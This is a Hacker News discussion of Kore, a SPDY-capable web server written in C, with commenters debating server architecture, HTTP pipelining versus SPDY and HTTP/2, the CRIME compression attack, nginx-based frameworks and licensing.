
KORE – A fast SPDY-capable webserver for web development in C - dhotson
https://kore.io/
======
a-priori
Okay here's a peeve of mine: just because something is in C ("no overhead!")
doesn't mean it's faster than something in another language in all situations.

As an example, this server uses a thread pool architecture. This architecture
will perform poorly with slow clients (common on the public Internet), servers
which have to interact with slow disks or external services, and is useless
for long-polling. It's only useful for CPU-bound applications when you can
assume fast clients and short requests.

In fact, I could make this server grind to a halt by opening one connection
per worker, issuing partial requests to each, then letting the connection
hang. So to be used in production, this server will have to sit behind
something like nginx, which can insulate your application from pathologically
slow clients.

~~~
mpweiher
> this server uses a thread pool architecture.

Is the README wrong? It says:

"Event driven architecture and worker processes for throughput"

To me this indicates using events for the external interface (slow clients),
and threads for taking advantage of multiple cores.

~~~
lasercalm
It looks like the README is accurate. A number of child processes are forked
off and then event processing is done with kqueue on the BSD platform and
epoll on Linux.

------
richo
> Secure by default > SPDY

Choose one, SPDY mandates gzip, and gzip in SSL/TLS is vulnerable to leaking
repeated plaintext, eg cookies in nearly every implementation.

[http://en.wikipedia.org/wiki/CRIME_(security_exploit)](http://en.wikipedia.org/wiki/CRIME_\(security_exploit\))

~~~
osth
I choose HTTP/1.1 pipelining. Uncompressed headers are useful. Ordered records
are returned (unlike SPDY), where "HTTP/1.1 200 OK" is the record separator.
Been using this for a decade. Can't see the benefit of SPDY.

Anyway pipelining is only useful where numerous resources are coming from the
same host. But the way the www has evolved, so much (unneeded) crap gets
served from ad servers and CDN's. Pipelining isn't going to speed that up.

HTTP/1.1 pipelining was never broken. It was usually just turned off (e.g. in
Firefox), while most web servers have their max keep alive set around 100. In
plain English, what does that mean? It means "Dear User, You have permission
to download 100 files at a time from
[http://stupidwebsite.com](http://stupidwebsite.com). That is you can make one
request for 100 files, instead of 100 separate requests, each for a single
file." And what do Firefox and other braindead web browsers do? They make a
separate request for each file. But heay, never mind all those numerous
connections to ad servers to retrieve marketing garbage (i.e. not the content
you are after), lets concentrate on compressing HTTP headers instead.
Brilliant.

It's trivial to use pipelining: 1. Feed your HTTP requests through netcat or
some equivalent to retrieve the files and save them to a concatenated file, 2.
split the concatenated file into separate files if desired, 3. view in your
favorite browser.

No ad server BS.

Now that's "SPEEDY".

~~~
dcsommer
Pipelining falls short of SPDY in several respects. The biggest problem is
that it suffers from head of line blocking. One slow request or response
prevents others from making progress.

~~~
osth
I trust in theory this is true, but I've never personally observed this in
practice.

I guess SPDY fans' marketing of this "feature" would be more convincing if I
could see a demonstration.

I just don't see any noticeable delays when using pipelining.

What strikes me as peculiar about the interest in SPDY is that I never saw any
interest in pipelining before SPDY. And I really doubt it was because of
potential head of line blocking or lack of header compression. I think users
just were not clued in about pipelining.

The speed up between not using pipelining and using it is, IME, enormous. 1
connection for 100 files versus 100 connections for 100 files. It is a huge
efficiency gain.

Yet most users have never even heard of HTTP pipelining, or never tried it. If
they really wanted such a big speed up, why wouldn't they use pipelining, or
at least try it? Why wouldn't they demand that browsers implement it and turn
it on by default?

Users are being encouraged to jump right into SPDY, a very recent and
relatively untested internal project (e.g. see the CRIME incident) of one
company, most users, if not all, having never previously experimented with
even basic pipelining, which has been around since the 1999 HTTP/1.1 spec and
has support via keep alives in almost all web servers.

Noticeable speed gains would be seen if www pages were not so burdened with
links to resources on external hosts. That's what's really slowing things
down, as browsers make dozens of connections just to load a single page with
little content. The speed gains from cutting out all that third party host
cruft would make any speed gains from avoiding theoretical potential head of
line blocking during pipelining seem miniscule and hardly worth all the
effort.

If you want to see how much pipelining speeds up getting many files from the
same host, you do not need SPDY to do that. Web servers already have the
support you need to do HTTP/1.1 pipelining. (Though on rare occasions site
admins have keep-alives disabled, like HN for example. In effect these admins
are saying, "Sorry, no pipelining for you.")

~~~
akalin
HTTP pipelining is turned off by default in most browsers due to concerns with
buggy proxies and servers (see
[https://bugzilla.mozilla.org/show_bug.cgi?id=264354](https://bugzilla.mozilla.org/show_bug.cgi?id=264354)
). It may work for you and the particular set of servers you visit, but I
suspect browser developers would rather have a browser that by default works
with the widest possible range of configurations.

Unfortunately, it being turned off by default in most browsers means that most
people won't see the benefits from it. Hopefully, the upcoming HTTP/2 standard
will fare better (latest draft: [https://tools.ietf.org/html/draft-unicorn-
httpbis-http2-01](https://tools.ietf.org/html/draft-unicorn-httpbis-http2-01)
).

Note that HTTP/2 will be based on SPDY (in particular, SPDY/4 with the new
header compressor). Hopefully, when the standard is finalized and we have
multiple strong implementations, that will allay the concerns you seem to have
with SPDY today.

(Disclaimer: I work on SPDY / HTTP/2 for Chromium.)

~~~
osth
Yes, I understand there are buggy servers and proxies... and I use a browser
that has settings to accomodate them. However... I do not know about HTTP bugs
that affect <emphasis>pipelining<emphasis>. And... in addition, for
pipelining, I do not use a browser to do the initial retrieval. I use
something like netcat to fetch and then I view the results with a browser.

Can you give me a list of buggy servers where my HTTP/1.1 pipelining will not
work as desired? I've been doing pipelining for 10 years (that's quite a few
servers I've tried) with no problems.

The arguments made by SPDY fans (e.g. Google employees) all seem plausible.
But I wonder why they are never supported by evidence? IOW, please show me,
don't just tell me. SPDY seems to solve "problems" I'm not having. Where can I
see these HTTP/1.1 pipelining problems (not just problems with browsers like
Firefox or Chrome) in action? I'd love to try some of the buggy servers you
allude to and see if they slow down pipelining with netcat.

~~~
akalin
I didn't have to look hard to find bug reports for pipelining. An example is
[https://bugs.launchpad.net/ubuntu/+source/apt/+bug/948461](https://bugs.launchpad.net/ubuntu/+source/apt/+bug/948461)
for Amazon's S3. I'd be interested if the problem is still reproducible now.
Also, one of the comments mentions Squid 2.0.2 as being buggy.

Also, see [https://insouciant.org/tech/status-of-http-pipelining-in-
chr...](https://insouciant.org/tech/status-of-http-pipelining-in-chromium/)
for a link to Firefox's blacklist of buggy servers (and a good discussion of
pipelining in Chromium).

Most of the improvements in SPDY are latency improvements, so if you're
downloading sites with netcat and then viewing them in a browser, I'm pretty
sure the overhead of that would dwarf anything SPDY would save. That having
been said, there's ample evidence of SPDY improving things. From
[http://bitsup.blogspot.com/2012/11/a-brief-note-on-
pipelines...](http://bitsup.blogspot.com/2012/11/a-brief-note-on-pipelines-
for-firefox.html) :

"Also see telemetry for TRANSACTION_WAIT_TIME_HTTP and
TRANSACTON_WAIT_TIME_HTTP_PIPELINES - you'll see that pipelines do marginally
reduce queuing time, but not by a heck of a lot in practice. (~65% of
transactions are sent within 50ms using straight HTTP, ~75% with pipelining
enabled).... Check out TRANSACTON_WAIT_TIME_SPDY and you'll see that 93% of
all transactions wait less than 1ms in the queue!"

~~~
osth
Thanks for the reading material.

You omitted the sentence before your excerpt where Mr. McManus suggests we
move to a multiplexed pipelined protocol for HTTP.

I'll go further. I say we need a lower level, large framed, multiplexed
protocol, carried over UDP, that can accomodate HTTP, SMTP, etc. Why restrict
multiplexing to HTTP and "web browsers"? Why are we funnelling everything
through a web browser ("HTTP is the new waist") and looking to the web browser
as the key to all evolution? It seems obvious to me what we all want in end to
end peer to peer connectivity. Although the user cannot articulate that, it's
clear they expect to have "stable connections". This end to end connectivity
was the original state of the internet. Before "firewalls". Client-server is
only so useful. It seems to me we want a "local" copy of the data sources that
we need to access. We want data to be "synced" across locations. A poor
substitute for such "local copies" has been moving data to network facilities
located at the edge, shortening the distance to the user.

But, back to reality, in the case of http servers, common sense tells me that
opening myriad connections to (often busy) web servers to retrieve myriad
resources is more prone to potential delays or other problems (and such delays
could be due to any number of reasons) than opening a single connection to
retrieve said myriad resources. Moreover, are his observations are in the
context of one browser?

I guess when you work on a browser development team, you might get a sort of
tunnel vision, where the browser becomes the center of the universe.

If you dream of multiplexing over stable connections, then you should dream
bigger than the web browser. IMO.

I'm aware of a bug in some PHP databases with keep alive after POST. I mainly
use pipelining for document retrieval (versus document submission) so I am not
a good judge of this. What I'm curious about is where keep alives after POST
would be desirable. You alluded to that usage scenario (a series of GET's
after a large POST).

~~~
akalin
Re. Patrick's sentence, you're right, but as I mentioned above, SPDY/4 will
become HTTP/2 (we're working through the standardization process). So I think
most of the major players are on board with "fixing" HTTP pipelining by using
SPDY-style multiplexing.

Re. thinking bigger, you might want to read up on QUIC, which was announced
recently:
[http://en.wikipedia.org/wiki/QUIC](http://en.wikipedia.org/wiki/QUIC) . Based
on that, I would content that at least we on the Chromium team don't have
tunnel vision. :)

Re. your question, Patrick's data is from Firefox only I believe. You're right
that it's not surprising his stats show that SPDY helps over HTTP without
pipelining. But the more interesting thing is that HTTP with pipelining still
doesn't help that much over HTTP without pipelining (on average) and SPDY
still beats it by orders of magnitude. I'd have to dig, but I'm pretty sure
there are similar stats on the Chromium side.

~~~
osth
Yes, a major appeal of pipelining to me is efficiency with respect to open
connections. It's easier to monitor the progress of one connection sending
multiple HTTP verbs than multiple connections each sending one verb.

Whether multiple verbs over one connection are processed by the given httpd
more efficiently than single verbs over single connections is another issue.
IME, a purely client-side perspective, pipelining does speed things up. But
then I'm not using Firefox to do the pipelining.

I'm sure the team reponsible for Googlebot would have some insight on this
question. (And I wonder how much SPDY makes the bot's job easier?)

In any event, multiplexing would appear to solve the open connections issue.
And I don't doubt it will consistently beat HTTP/1.1 pipelining alone. I'm a
big fan of multiplexing (for peer-to-peer "connections"), but I am perplexed
by why it's being applied at the high level of HTTP (and hence restricted to
TCP, and all of its own inefficiencies and limitations).

I'm curious about something you said earlier. You said something about the
"overhead" of using netcat. It's relatively a very small, simple program with
modest resource requirements. What did you mean by overhead?

~~~
akalin
Re. multiplexing at the HTTP layer, because an HTTP replacement has to be
deployable and testable. However, now that the ideas in SPDY have been proven
and are on their way to being standardized, you can look at QUIC to see what
can be done when not limited to TCP and HTTP.

By overhead I mean latency overhead -- running a program to download a site to
a local file and then displaying it in a browser will almost certainly have a
higher time to start render. Not to mention you're hitting everything cold
(i.e., not using the browser's cache).

~~~
osth
I don't measure latency as including rendering time. Maybe I'm not "rendering"
anything except pure html.

I measure HTTP latency as the time it takes to retrive the resources.

Whatever happens after that is up to the user. Maybe she wants to just read
plain text (think text-only Google cache). Maybe she wants to view images.
Maybe she wants to view video. Maybe she only wants resources from one host.
Maybe she does not want resources from ad servers. We just do not know.
Today's webpages are so often collections of resources from a variety of
hosts. We can't presume that the user will be interested in each and every
resource.

Of course those doing web development like to make lots of presumptions about
how users will view a webpage. Still, these developers must tolerate that the
speed of users' connections vary, the computers they use vary, and the
browsers they use vary, and some routinely violate "standards". Heck, some
users might even clear their browser cache now and again.

But HTTP is not web development. It's just a way to request and submit
resources. Nothing more, and nothing less.

------
alkou
Do you have any benchmarks against nginx?
[http://nginx.org/en/docs/http/ngx_http_spdy_module.html](http://nginx.org/en/docs/http/ngx_http_spdy_module.html)

------
antihero
Would it be an interesting idea to create a framework for making webapps as
nginx modules? Sure, it's a pain in the ass, but nginx is evented as opposed
to thread pooled, and tried and tested. Because nginx takes up hardly any
memory, you could run a single nginx instance and proxy to other nginx
instances that are compiled purely to run the app.

Though the scope for creating critical vulnerabilities is _huge_.

~~~
eric_bullington
There is such a framework: openresty

[http://openresty.org/](http://openresty.org/)

It uses a wide range of 3rd-party nginx modules, and Lua as a scripting
language, to form a nice little framework. Extraordinarily fast by any
standards.

~~~
fcambus
Lapis is also worth mentioning :
[http://leafo.net/lapis/](http://leafo.net/lapis/)

Lapis is a framework for building web applications using MoonScript (or Lua)
that runs inside of a customized version of Nginx called OpenResty.

~~~
antihero
That looks really interesting, thanks.

------
dschiptsov
Ceased reading after mem.c - pool-based memory allocation which cache-locality
awareness and data partitioning by access patterns is the must for a modern
server. Just to malloc every buffer you need is a naive strategy, which,
probably, will result in memory fragmentation and cache misses.

Surprisingly accurate and clean C. This guy is good one for hiring (assuming
he wishes to be hired).

------
betterunix
Why web development in C? Seems like a headache.

~~~
weland
It's quite a gift for embedded systems. It's very convenient to have a self-
contained solution for a web interface, rather than drag an interpreter and a
web server on an already crowded rootfs. Plus, you can get the benefit of
static analysis and the like, which is extra useful on such systems.

~~~
drdaeman
I believe there are relatively many AOT-compiled-to-native-code languages
other than C.

~~~
pi18n
But have they equal tooling? That's why I'd be using C if I were using C for
something; it's "portable assembly".

------
kaoD
It's ironic that the website isn't working. Alternate link? (GitHub perhaps?)

~~~
bobol
[https://github.com/jorisvink/kore](https://github.com/jorisvink/kore)

------
anuragramdasan
Web development in C, I love this.

~~~
ndesaulniers
It's just a server. Many sites sit behind nginx, a web server also written in
C, as a reverse proxy but that doesn't make them "web development in C."

Edit: This is web development in C:
[https://github.com/jorisvink/kore_website/blob/master/src/si...](https://github.com/jorisvink/kore_website/blob/master/src/site.c)

------
aray
Why the ISC license? The site just says "Kore is licensed under the ISC
license allowing it to be used in both free and commercial products." but
don't Apache 2, BSD, and MIT all satisfy this as well.

IANAL, but here's a quick summary of ISC vs MIT:
[http://www.tldrlegal.com/compare?a=MIT+License&b=ISC+License](http://www.tldrlegal.com/compare?a=MIT+License&b=ISC+License)

~~~
protomyth
OpenBSD went with ISC for new code:
[http://www.openbsd.org/policy.html](http://www.openbsd.org/policy.html)

------
nvartolomei
Take libuv > WIN, to watch
[http://vimeo.com/24713213](http://vimeo.com/24713213).

Libuv is used in nodejs.

------
running_foo
What are some frameworks for web developing in C? Is KORE also a framework or
just a server?

As for the server, I wonder how performance compares to say, OpenResty loading
Lua compiled to bytecode.

------
ams6110
Web development in C. Reminds me of aolserver.

[http://www.aolserver.com/docs/devel/c/](http://www.aolserver.com/docs/devel/c/)

------
X4
Every new HTTP Daemon is heartly welcome!

------
bobol
Connection timeout?

Brilliant idea, I especially love the SSL only. The web needs to move to pure
SSL.

~~~
davis_m
That is a by-product of being SPDY compliant. The SPDY spec doesn't allow for
unencrypted traffic, which is just one reason we need to switch over.

